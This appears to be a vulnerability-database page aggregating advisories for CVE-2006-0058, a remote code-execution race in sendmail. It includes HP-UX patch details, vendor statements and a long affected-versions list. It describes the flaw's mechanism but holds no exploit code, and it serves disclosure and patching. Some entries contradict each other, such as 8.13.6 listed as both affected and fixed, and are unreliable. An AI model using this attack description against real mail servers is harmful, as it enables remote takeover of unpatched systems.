cksum 954959898 5130240
md5 C85EFD8AEDB16EEF1DF0FF65988350C0
sendmail -bs banner:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25
what(1) string:
Sendmail version 8.13.3 - Revision 2.002_Beta - 2006/03/25

For sendmail 8.11.1, HP-UX B.11.23

 ->Note: If UNOF_INET31734_1 .depot or UNOF_INET31734_3.depot has
 ->been installed, it must be removed using swremove(1M) before
 ->installing UNOF_INET31734_4.depot.

 ->UNOF_INET31734_4.depot
 ->cksum 2157915677 3317760
 ->md5 10e6bf81c4a5ca75e77ae942c57b2641
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 (UNOF_INET31734_4)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - 2006/05/16 (UNOF_INET31734_4)

For sendmail 8.11.1, HP-UX B.11.11

 ->sendmail-811_09.depot
 ->cksum 1490250822 2938880
 ->md5 c1dbd4784e91282e6a08a88944ffe22b
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 (Revision 1.9)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - (Revision 1.9) - 2006/05/16

For sendmail 8.11.1, HP-UX B.11.00

 ->sendmail-811_01.008.depot
 ->cksum 2401149843 2897920
 ->md5 7e449621f81646fac1b5abd67c2a5b4b
 ->sendmail -bs banner:
 ->Sendmail 8.11.1 - (Revision 1.8)
 ->what(1) string:
 ->version.c 8.11.1 (Berkeley) - (Revision 1.8) - 2006/05/02

For sendmail 8.9.3, HP-UX B.11.11
 ->If UNOF_INET_29774_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_31917 or subsequent

For sendmail 8.9.3, HP-UX B.11.00
 ->If UNOF_INET_29772_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_32006 or subsequent

For sendmail 8.8.6, HP-UX B.11.00
 ->If UNOF_INET_29772_3.depot is installed, remove it using swremove(1M).
 ->Then install:
 ->PHNE_32006 or subsequent
 ->Note : PHNE_32006 or subsequent upgrades sendmail 8.8.6 to sendmail 8.9.3.



For all versions of sendmail:
modify sendmail.cf to add 'restrictqrun' to the PrivacyOptions.


After installation, verify output of what /usr/sbin/sendmail.
To check if installations are running sendmail 8.8.6 execute
"what /usr/sbin/sendmail" and check the version string.

MANUAL ACTIONS: Yes - NonUpdate
HP-UX B.11.00 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions
HP-UX B.11.11 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions
HP-UX B.11.23 - install preliminary software updates from ftp server
modify /etc/mail/sendmail.cf to add 'restrictqrun' to the PrivacyOptions


PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00
analyzes all HP-issued Security Bulletins to provide a subset of
recommended actions that potentially affect a specific HP-UX
system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY:
Version: 1 (rev.1) - 25 March 2006 Initial release
Version: 2 (rev.2) - 30 March 2006 updated md5 / cksum output
Version: 3 (rev.3) - 04 April 2006 updated B.11.23 depot,
added 8.11.1 for B.11.23 depot
Version: 4 (rev.4) - 07 April 2006 added 8.9.3 depot for B.11.11
Version: 5 (rev.5) - 10 April 2006 clarified affected versions
Version: 6 (rev.6) - 12 April 2006 added 8.9.3 and 8.11.1 depots for B.11.00
Version: 7 (rev.7) - 18 April 2006 added 8.11.1 upgrade for HP-UX B.11.11
Version: 8 (rev.8) - 24 April 2006 replaced 8.9.3 depot for HP-UX B.11.00
and B.11.11
Version: 9 (rev.9) - 25 April 2006 added manual actions
Version: 10 (rev.10) - 03 May 2006 replaced 8.9.3 depot for HP-UX B.11.00
and B.11.11, added 8.11.1 depot for B.11.00
Version: 11 (rev.11) - 18 May 2006 sendmail 8.11.1 replacements
UNOF_INET31734_4, sendmail-811_01.008.depot, and sendmail-811_09.depot,
sendmail 8.9.3 new PHNE_31917, sendmail 8.8.6, sendmail 8.9.3 new PHNE_32006


Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com.  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&
langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
    continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
    save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
    - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

    GN = HP General SW,
    MA = HP Management Agents,
    MI = Misc. 3rd party SW,
    MP = HP MPE/iX,
    NS = HP NonStop Servers,
    OV = HP OpenVMS,
    PI = HP Printing & Imaging,
    ST = HP Storage SW,
    TL = HP Trusted Linux,
    TU = HP Tru64 UNIX,
    UX = HP-UX,
    VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."


(c)Copyright 2006 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of any kind. To the
extent permitted by law, neither HP nor its affiliates,
subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration.
The information in this document is subject to change without
notice. Hewlett-Packard Company and the names of Hewlett-Packard
products referenced herein are trademarks of Hewlett-Packard
Company in the United States and other countries. Other product
and company names mentioned herein may be trademarks of their
respective owners.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBRGzEHOAfOvwtKn1ZEQK+7QCfakVdKfPPavd4j5ji3xbl2bj/rB4An2tB
uwjImqfLazewfRyo6wCc+cAO
=1YDc
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F44950)

sendmail0058.txt (PacketStormID:F44950)
2006-03-28 00:00:00
 
advisory,remote,arbitrary
linux,unix
CVE-2006-0058
[点击下载]

Sendmail, Inc. has recently become aware of a security vulnerability in certain versions of sendmail Mail Transfer Agent (MTA) and UNIX and Linux products that contain it. Sendmail was notified by security researchers at ISS that, under some specific timing conditions, this vulnerability may permit a specifically crafted attack to take over the sendmail MTA process, allowing remote attackers to execute commands and run arbitrary programs on the system running the MTA, affecting email delivery, or tampering with other programs and data on this system. Versions 8.13.5 and below are affected.

the official advisory from http://www.sendmail.com/company/advisory/
===
Sendmail MTA Security Vulnerability

March 22, 2006

I. Overview

Sendmail, Inc. has recently become aware of a security vulnerability in 
certain versions of sendmail Mail Transfer Agent (MTA) and UNIX and Linux 
products that contain it.  Sendmail was notified by security researchers at 
ISS that, under some specific timing conditions, this vulnerability may 
permit a specifically crafted attack to take over the sendmail MTA process, 
allowing remote attackers to execute commands and run arbitrary programs on 
the system running the MTA, affecting email delivery, or tampering with 
other programs and data on this system.  This vulnerability is being 
tracked as CVE-2006-0058 and can be found at 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058.

Sendmail is not aware of any public exploit code for this 
vulnerability.  This connection-oriented vulnerability does not occur in 
the normal course of sending and receiving email.  It is only triggered 
when specific conditions are created through SMTP connection layer commands.

Sendmail has confirmed the technical issue exposing this vulnerability and 
is providing patches that resolve it in our open source and commercial 
products.  Sendmail has also alerted CERT    

- 漏洞信息

24037
Sendmail Signal Handler Race Condition Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Sendmail contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the sm_syslog() function which allows an attacker to pass crafted data to the setjmp(3) and longjmp(3) function causing memory corruption. This can be used to remotely execute arbitrary code without authentication.

- 时间线

2006-03-22 Unknow
2006-03-22 Unknow

- 解决方案

Upgrade to version 8.13.6 or higher, as it has been reported to fix this vulnerability. In addition, Sendmail has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

Sendmail Asynchronous Signal Handling Remote Code Execution Vulnerability
Race Condition Error 17192
Yes No
2006-03-22 12:00:00 2007-09-22 12:00:00
Discovered by Mark Dowd.

- 受影响的程序版本

Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Turbolinux Appliance Server 2.0
Trend Micro InterScan VirusWall 8.0
Trend Micro InterScan VirusWall 7.0
SuSE SUSE Linux Enterprise Server 8
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 10.0_x86
Sun Solaris 10
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 550
Sun Cobalt RaQ 4
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 3.0 SP6
SGI IRIX 6.5.29
SGI IRIX 6.5.28
SGI IRIX 6.5.27
SGI IRIX 6.5.26
SGI IRIX 6.5.25
SGI IRIX 6.5.24 m
SGI IRIX 6.5.24
SGI IRIX 6.5.23 m
SGI IRIX 6.5.23
SGI IRIX 6.5.22 m
SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.21
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
Sendmail Consortium Sendmail 8.13.5
Sendmail Consortium Sendmail 8.13.4
Sendmail Consortium Sendmail 8.13.3
Sendmail Consortium Sendmail 8.12.11
Sendmail Consortium Sendmail 8.12.10
Sendmail Consortium Sendmail 8.12.9
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Sendmail Consortium Sendmail 8.12.7
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.3
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.7
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
Sendmail Consortium Sendmail 8.8.8
SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Open Server 6.0
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server 9
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core5
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
OpenBSD OpenBSD 3.8
OpenBSD OpenBSD 3.7
OpenBSD OpenBSD 3.6
OpenBSD OpenBSD 3.5
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
Nortel Networks W-NMS-UMTS 4.2
Nortel Networks W-NMS-GPRS 4.2
Nortel Networks W-NMS-CNM 1.0
NetBSD NetBSD 2.1
NetBSD NetBSD 2.0.3
NetBSD NetBSD 2.0.2
NetBSD NetBSD 2.0.1
NetBSD NetBSD 2.0
NetBSD NetBSD 1.6.2
NetBSD NetBSD 1.6.1
NetBSD NetBSD 1.6 beta
NetBSD NetBSD 1.6
Navision Financials Server 3.0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
IBM Hardware Management Console (HMC) 5.2.1
IBM AIX 5.3 L
IBM AIX 5.2 L
IBM AIX 5.1 L
IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1
HP Tru64 5.1 B-3
HP Tru64 5.1 B-2 PK4
HP Tru64 5.1 A PK6
HP Tru64 4.0 G PK4
HP Tru64 4.0 F PK8
HP Internet Express 6.5
HP Internet Express 6.4
HP Internet Express 6.3
HP HP-UX 11.23
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX B.11.23
HP HP-UX B.11.11
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Gentoo Linux
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 4.9 -RELENG
FreeBSD FreeBSD 4.9 -PRERELEASE
FreeBSD FreeBSD 4.9
FreeBSD FreeBSD 4.8 -RELENG
FreeBSD FreeBSD 4.8 -RELEASE-p7
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELENG
FreeBSD FreeBSD 4.7 -RELEASE-p17
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELENG
FreeBSD FreeBSD 4.6 -RELEASE-p20
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELENG
FreeBSD FreeBSD 4.5 -RELEASE-p32
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4 -RELEASE-p42
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE-p38
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 -RELENG
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
FreeBSD FreeBSD 3.5.1 -STABLE
FreeBSD FreeBSD 3.5.1 -RELEASE
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 3.5 x
FreeBSD FreeBSD 3.5 -STABLEpre122300
FreeBSD FreeBSD 3.5 -STABLEpre050201
FreeBSD FreeBSD 3.5 -STABLE
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4 x
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3 x
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2 x
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1 x
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0 -RELENG
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2 x
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
FreeBSD FreeBSD 5.4-STABLE
FreeBSD FreeBSD 4.10-PRERELEASE
FreeBSD FreeBSD 3.x
FreeBSD FreeBSD 2.x
F-Secure Messaging Security Gateway X200 3.1
F-Secure Messaging Security Gateway P800 3.2.4
F-Secure Messaging Security Gateway P600 3.2.4
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya Communication Manager Server S8700
Avaya Communication Manager Server S8500
Avaya Communication Manager Server S8300
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 13.1
Sendmail Consortium Sendmail 8.13.6

- 不受影响的程序版本

Sendmail Consortium Sendmail 8.13.6

- 漏洞讨论

Sendmail is prone to a remote code-execution vulnerability.

Remote attackers may leverage this issue to execute arbitrary code with the privileges of the application, which typically runs as superuser.

Versions prior to Sendmail 8.13.6 are vulnerable to this issue.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com

Proof-of-concept exploits are available.

- 解决方案

The vendor has released version 8.13.6 to address this issue.

Please see the referenced advisories for more information and fixes.


OpenBSD OpenBSD 3.0

IBM AIX 5.1

HP HP-UX B.11.11

OpenBSD OpenBSD 3.1

HP HP-UX B.11.00

OpenBSD OpenBSD 3.5

OpenBSD OpenBSD 2.3

OpenBSD OpenBSD 2.5

FreeBSD FreeBSD 4.8 -PRERELEASE

FreeBSD FreeBSD 4.8

SCO Unixware 7.1.4

Sendmail Consortium Sendmail 8.11.2

Sendmail Consortium Sendmail 8.12 beta5

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.11

Sendmail Consortium Sendmail 8.12.8

Sendmail Consortium Sendmail 8.13.5

Sendmail Consortium Sendmail 8.9.2

Sendmail Consortium Sendmail 8.9.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站